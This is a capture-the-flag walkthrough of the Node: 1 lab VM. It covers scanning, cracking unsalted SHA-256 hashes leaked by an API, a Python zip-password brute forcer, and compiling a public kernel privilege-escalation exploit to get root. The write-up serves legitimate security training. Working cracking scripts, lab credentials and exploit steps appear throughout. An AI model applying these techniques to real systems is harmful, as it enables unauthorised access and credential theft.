Tovi Jaeschke

Node: 1 boot2root walkthrough

Walkthrough for the Node: 1 CTF, which was originally created for HackTheBox and later uploaded to vulnhub.com.

Scanning & Recon

I start by running netdiscover to find the IP address of the target.


netdiscover -r 10.1.1.1/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

15 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 900
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.84       08:00:27:a2:8a:95      2     120  PCS Systemtechnik GmbH

The vendor column gives the target away immediately: PCS Systemtechnik GmbH is the OUI registered for VirtualBox NICs, so 10.1.1.84 is the VM. I tried opening the address in my browser, but the connection timed out, so nothing is listening on the usual web ports. Let's see what ports Node does have open.

nmap -p- -sV -oN nmap_Node.txt 10.1.1.84
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-18 14:53 ACDT
Nmap scan report for 10.1.1.84
Host is up (0.00042s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:A2:8A:95 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.00 seconds

So now we know SSH is open and there is a Node.js/Express server on port 3000. I had a poke around the website, titled "MyPlace", read the source, and tried robots.txt, which just redirected me to the index. In the client-side JavaScript I found the path /api/admin/backup, a JSON API that returned a single entry, authenticated: false. That doesn't help on its own, but it does confirm there is an admin area. I tried scanning for directories with dirb and dirsearch, but neither found anything: the server answers every unknown path with the index page, so a scanner that classifies hits by status code alone sees nothing. Filtering on response length or body hash, or comparing each response against a baseline taken from a path that cannot exist, is the usual way around this. Next, I opened Burp Suite and spidered the host, which instantly turned up something that piqued my interest.
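Before getting to what the spider found, the directory-scanning problem above is worth a concrete illustration. The script below is an added example, not code from the original post: it fakes a site that serves the index for every unknown path, and contrasts a status-code-only scan (what dirb and dirsearch were effectively doing here) with one that first fingerprints a few random paths that cannot exist and discards anything matching that baseline. The fake site, its paths and fake_fetch are constructed for the example; on a real host you would replace fake_fetch with an HTTP GET that returns the final status and body.

```python
#!/usr/bin/env python3
"""Directory brute force that copes with a catch-all index ("soft 404")."""
import hashlib
import secrets

INDEX_HTML = "<html><title>MyPlace</title><body>welcome</body></html>"

# Constructed fake site: every path that is not listed here gets the index page
# with HTTP 200, which is the behaviour that defeated dirb and dirsearch.
FAKE_SITE = {
    "/": (200, INDEX_HTML),
    "/api/users": (200, '[{"username": "mark"}]'),
    "/api/admin/backup": (200, '{"authenticated": false}'),
}


def fake_fetch(path):
    """Stand-in for an HTTP GET: returns (status, body). Swap in urllib for a real host."""
    return FAKE_SITE.get(path, (200, INDEX_HTML))


def fingerprint(status, body):
    """Classify a response by status plus body hash, not by status alone."""
    return status, hashlib.sha256(body.encode("utf-8")).hexdigest()


def soft404_baseline(fetch, samples=3):
    """Request a few random paths that cannot exist and record what the server
    returns for them; any later response matching this signature is a non-hit."""
    return {fingerprint(*fetch("/" + secrets.token_hex(8))) for _ in range(samples)}


def status_only_dirs(fetch, wordlist):
    """What a status-code-only scanner sees: every non-404 response is a 'hit'."""
    hits = []
    for word in wordlist:
        status, _ = fetch("/" + word)
        if status != 404:
            hits.append(("/" + word, status))
    return hits


def baseline_dirs(fetch, wordlist):
    """Same scan, but drop responses indistinguishable from the soft-404 baseline."""
    baseline = soft404_baseline(fetch)
    hits = []
    for word in wordlist:
        path = "/" + word
        status, body = fetch(path)
        if fingerprint(status, body) in baseline:
            continue  # looks exactly like the catch-all index: not a real path
        hits.append((path, status))
    return hits


if __name__ == "__main__":
    words = ["robots.txt", "admin", "backup", "api/users", "api/admin/backup"]
    print("status only:", status_only_dirs(fake_fetch, words))
    print("baseline   :", baseline_dirs(fake_fetch, words))
```

The status-only scan reports every word in the list as a hit, which is as useless as reporting none; the baseline scan keeps only the two paths whose responses differ from the index. Note that a body hash is brittle if the index page embeds anything dynamic (a CSRF token, a timestamp); in that case compare lengths within a tolerance, or strip the varying element before hashing.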

A JSON file with the usernames and password hashes of all the users. I used hash-identifier to check what type of hash was used, which was SHA-256, and since the hashes were unsalted raw digests I ran them through john the ripper with a wordlist, which cracked three of the four almost instantly.


cat ~/.john/john.pot
$SHA256$de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
$SHA256$f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
$SHA256$dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
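The reason this step is so quick is worth seeing in code. The script below is an added example, not code from the original post: it takes a leaked user list in the JSON shape the API returned, checks that the digests look like SHA-256 by length, and because there is no salt it hashes each wordlist entry once and looks it up against every account at the same time. The user list and wordlist are constructed for the example; the three digests are the ones in the john.pot above, the usernames are placeholders, and the fourth digest is generated at import time from a passphrase not in the wordlist so that it stays uncracked.

```python
#!/usr/bin/env python3
"""Offline wordlist attack on unsalted SHA-256 password hashes leaked by a web API."""
import hashlib
import json
import re

# Constructed sample of a leaked user list. Usernames are placeholders; the first
# three digests are the ones john cracked in the post, the fourth is generated here.
SAMPLE_USERS_JSON = json.dumps([
    {"username": "admin_account", "is_admin": True,
     "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"},
    {"username": "user_a", "is_admin": False,
     "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240"},
    {"username": "user_b", "is_admin": False,
     "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73"},
    {"username": "user_c", "is_admin": False,
     "password": hashlib.sha256(b"correct horse battery staple 9f3k").hexdigest()},
])

# Constructed stand-in for rockyou.txt.
SAMPLE_WORDLIST = ["password", "123456", "spongebob", "letmein",
                   "snowflake", "manchester", "qwerty"]

HEX_RE = re.compile(r"^[0-9a-f]+$")


def guess_hash_type(digest):
    """Rough type guess from the length of a hex digest (what hash-identifier does)."""
    if not HEX_RE.match(digest.lower()):
        return None
    return {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}.get(len(digest))


def crack_sha256(users_json, wordlist):
    """Return {username: password} for every user whose unsalted SHA-256 digest
    matches a wordlist entry. One digest per candidate covers all accounts at once."""
    lookup = {}
    for user in json.loads(users_json):
        if guess_hash_type(user["password"]) == "sha256":
            lookup.setdefault(user["password"].lower(), []).append(user["username"])
    total = sum(len(names) for names in lookup.values())
    cracked = {}
    for word in wordlist:
        digest = hashlib.sha256(word.encode("utf-8")).hexdigest()
        for name in lookup.get(digest, []):
            cracked[name] = word
        if len(cracked) == total:
            break  # nothing left to crack
    return cracked


def admin_credentials(users_json, cracked):
    """Return (username, password) for the first is_admin user that was cracked, else None."""
    for user in json.loads(users_json):
        if user.get("is_admin") and user["username"] in cracked:
            return user["username"], cracked[user["username"]]
    return None


if __name__ == "__main__":
    found = crack_sha256(SAMPLE_USERS_JSON, SAMPLE_WORDLIST)
    for name, password in found.items():
        print(f"{name}: {password}")
    print("admin login:", admin_credentials(SAMPLE_USERS_JSON, found))
```

A per-user salt would force one digest per candidate per account, and a deliberately slow function such as bcrypt or scrypt would make even that impractical over rockyou; plain SHA-256 of the password gives an attacker neither obstacle, which is why three of four accounts fall in seconds.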

After cracking the passwords, I realized that one of them belonged to the user myPl4ceAdminAcc0unt, so I used those credentials to log in. The admin page had a single button that prompted me to download a backup of the site, which I did. After a lot of research, I found the backup was a base64-encoded, password-protected zip file. I decoded it and wrote a quick Python script to crack the zip password (zip2john and john would do the same job, and faster, but this gets the point across).


#!/usr/bin/env python3
"""Wordlist attack on a ZipCrypto-protected archive."""
import sys
import zipfile


def crack_zip(file_path, word_list):
	"""Return the first wordlist entry that decrypts the archive, or None."""
	try:
		zip_ = zipfile.ZipFile(file_path)
	except (OSError, zipfile.BadZipFile):
		print("Please check the file's path. It doesn't seem to be a zip file.")
		sys.exit(1)

	# rockyou.txt is not valid UTF-8 throughout, so read and re-encode it as latin-1
	# to keep every candidate byte-for-byte as it appears in the wordlist.
	with zip_, open(word_list, "r", encoding="ISO-8859-1") as f:
		for line in f:
			password = line.rstrip("\r\n")
			try:
				zip_.extractall(pwd=password.encode("ISO-8859-1"))
			except RuntimeError:
				# Wrong password: ZipCrypto's one-byte check failed.
				continue
			except zipfile.BadZipFile:
				# Roughly 1 in 256 wrong passwords passes the byte check and then fails the CRC.
				continue
			return password
	return None


if __name__ == '__main__':
	found = crack_zip("myplace.zip", "/usr/share/wordlists/rockyou.txt")
	if found is None:
		print("Sorry, password not found.")
		sys.exit(1)
	print("\nPassword cracked: {}\n".format(found))


./zipCrack.py
Password cracked: magicword

After cracking the password, I read through the extracted files and found a MongoDB connection URL containing the password for the user mark.

SSH Shell

So I tried those as SSH credentials, and they worked. After a long few hours of going through cron jobs and config files, looking for writable files and SUID binaries, and running unix-privesc-check and Linux_Exploit_Suggester, I finally found a privilege escalation exploit with searchsploit.

Root Access


searchsploit linux 4.4.0
--------------------------------------------------------------------------------------------------------------------- -------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/opt/exploit-database/)
--------------------------------------------------------------------------------------------------------------------- -------------------------------------
Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)                                    | exploits/linux/local/44696.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                     | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)                                                                 | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                  | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                               | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                    | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                | exploits/linux/local/43418.c
--------------------------------------------------------------------------------------------------------------------- -------------------------------------
Shellcodes: No Result
cp /opt/exploit-database/exploits/linux/local/44298.c .
gcc -o lpe 44298.c
scp lpe mark@10.1.1.84:/tmp
mark@10.1.1.84's password:
lpe                                                                                                                          100%   17KB   8.6MB/s   00:00

I then ran it on the target, which gave me a root shell. Two checks are worth doing before running any kernel exploit like this: compare uname -r on the target with the versions the exploit claims to cover (here, Ubuntu 16.04 kernels before 4.4.0-116), since an exploit against the wrong build is more likely to panic the machine than to escalate; and remember that a binary compiled on the attacking box is linked against that box's glibc, so if it refuses to run on the target, compile it there or build it statically.

Conclusion

Node: 1 definitely had an intermediate level of difficulty. There were a few times I got a little tripped up and went down the wrong rabbit hole. All in all though, it was a fun box to own, and it really shows how one misconfiguration (an API handing out password hashes to anyone who asks) combined with a slightly outdated kernel can lead to a full compromise.